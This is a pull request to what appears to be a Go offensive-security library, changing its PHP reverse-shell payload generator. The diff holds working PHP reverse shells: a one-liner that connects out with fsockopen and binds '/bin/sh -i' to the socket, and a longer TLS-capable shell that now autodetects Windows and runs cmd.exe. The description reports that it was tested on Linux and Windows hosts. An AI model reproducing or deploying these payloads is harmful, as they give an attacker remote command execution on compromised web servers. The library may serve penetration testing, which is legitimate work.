### PR TITLE
Fix reverse.PHP.Unflattened on Windows. Autodetect OS.

### DIFF
--- a/payload/reverse/php.go
+++ b/payload/reverse/php.go
@@ -8,6 +8,29 @@ const (
 	PHPDefault          = PHPLinuxInteractive
 	PHPLinuxInteractive = `<? $sock=fsockopen("%s",%d);$proc=proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes); ?>`
 	PHPUnflattened      = `<?
+function dataTransfer($input, $output) {
+	$data = fread($input, 1024);
+	fwrite($output, $data);
+}
+
+function windowsDataTransfer($input, $output) {
+	$size = fstat($input)['size'];
+	while ($size > 0) {
+		$readAmount = $size %% 1024;
+		$data = fread($input, $readAmount);
+		if (fwrite($output, $data)) {
+			$size -= $readAmount;
+		}
+	}
+}
+
+$windows = false;
+$prog = "/bin/sh";
+if (strpos(strtolower(PHP_OS), "win") !== false) {
+	$windows = true;
+	$prog = "cmd.exe";
+}
+
 $context = stream_context_create([
 	'ssl' => [
 		'verify_peer' => false,
@@ -16,7 +39,7 @@ $context = stream_context_create([
 ]);
 
 $stream = stream_socket_client("%s", $errno, $errstr, ini_get("default_socket_timeout"), STREAM_CLIENT_CONNECT, $context);
-$process = proc_open("%s", array(0=>array("pipe", "r"), 1=>array("pipe", "w"), 2=>array("pipe", "w")), $pipes);
+$process = proc_open($prog, array(0=>array("pipe", "r"), 1=>array("pipe", "w"), 2=>array("pipe", "w")), $pipes);
 stream_set_blocking($stream, 0);
 stream_set_blocking($pipes[0], 0);
 stream_set_blocking($pipes[1], 0);
@@ -31,16 +54,22 @@ while(true) {
 	$selected = stream_select($readArray, $empty, $empty, null);
 
 	if (in_array($stream, $readArray)) {
-		$sockData = fgets($stream);
-		fwrite($pipes[0], $sockData);
+		dataTransfer($stream, $pipes[0]);
 	}
-	if (in_array($pipes[1], $readArray)) {
-		$procOut = fgets($pipes[1]);
-		fwrite($stream, $procOut);
-	}
-	if (in_array($pipes[2], $readArray)) {
-		$procErr = fgets($pipes[2]);
-		fwrite($stream, $procErr);
+	if ($windows == false) {
+		if (in_array($pipes[1], $readArray)) {
+			dataTransfer($pipes[1], $stream);
+		}
+		if (in_array($pipes[2], $readArray)) {
+			dataTransfer($pipes[2], $stream);
+		}
+	} else {
+		if (fstat($pipes[1])["size"]) {
+			windowsDataTransfer($pipes[1], $stream);
+		}
+		if (fstat($pipes[2])["size"]) {
+			windowsDataTransfer($pipes[2], $stream);
+		}
 	}
 }
 
@@ -56,15 +85,16 @@ func (php *PHPPayload) LinuxInteractive(lhost string, lport int) string {
 	return fmt.Sprintf(PHPDefault, lhost, lport)
 }
 
-// Creates an encrypted reverse shell using PHP. The user can specify the shell used, for example
-// cmd.exe, /bin/sh, etc. The user also specifies if the reverse shell should be encrypted or not.
+// Creates an encrypted reverse shell using PHP. The payload autodetects the operating system and
+// will selected cmd.exe or /bin/sh accordingly.. The user also specifies if the reverse shell
+// should be encrypted or not.
 //
-// reverse.PHP.Unflattened("10.9.49.80", 1270, "/bin/sh", true).
-func (php *PHPPayload) Unflattened(lhost string, lport int, shell string, encrypted bool) string {
+// reverse.PHP.Unflattened("10.9.49.80", 1270, true).
+func (php *PHPPayload) Unflattened(lhost string, lport int, encrypted bool) string {
 	hostname := fmt.Sprintf("%s:%d", lhost, lport)
 	if encrypted {
 		hostname = "tls://" + hostname
 	}
 
-	return fmt.Sprintf(PHPUnflattened, hostname, shell)
+	return fmt.Sprintf(PHPUnflattened, hostname)
 }

--- a/payload/reverse/reverse_test.go
+++ b/payload/reverse/reverse_test.go
@@ -126,19 +126,13 @@ func TestPHPLinuxInteractive(t *testing.T) {
 }
 
 func TestPHPUnflattened(t *testing.T) {
-	payload := reverse.PHP.Unflattened("127.0.0.1", 8989, "/bin/sh", true)
+	payload := reverse.PHP.Unflattened("127.0.0.1", 8989, true)
 	if !strings.Contains(payload, `stream_socket_client("tls://127.0.0.1:8989",`) {
 		t.Fatal(payload)
 	}
-	if !strings.Contains(payload, `proc_open("/bin/sh",`) {
-		t.Fatal(payload)
-	}
 
-	payload = reverse.PHP.Unflattened("127.0.0.1", 8989, "/bin/bash", false)
+	payload = reverse.PHP.Unflattened("127.0.0.1", 8989, false)
 	if !strings.Contains(payload, `stream_socket_client("127.0.0.1:8989",`) {
-		t.Fatal(payload)
-	}
-	if !strings.Contains(payload, `proc_open("/bin/bash",`) {
 		t.Fatal(payload)
 	}
 }


### PR DESCRIPTION
Fixes #157 

select is apparently problematic on Windows, and fgets behavior was bad (at least when it encountered Japanese). Basically rewrote this to account for the different windows behavior (influenced by https://raw.githubusercontent.com/ivan-sincek/php-reverse-shell/master/src/reverse/php_reverse_shell.php), and since I was in there I figured I'd autodetect the target/shell since that's hugely beneficial (but does break the API... sorry!).

Tested on Linux (php7) and Windows (php8)... both Japanese and English locales :rofl: 
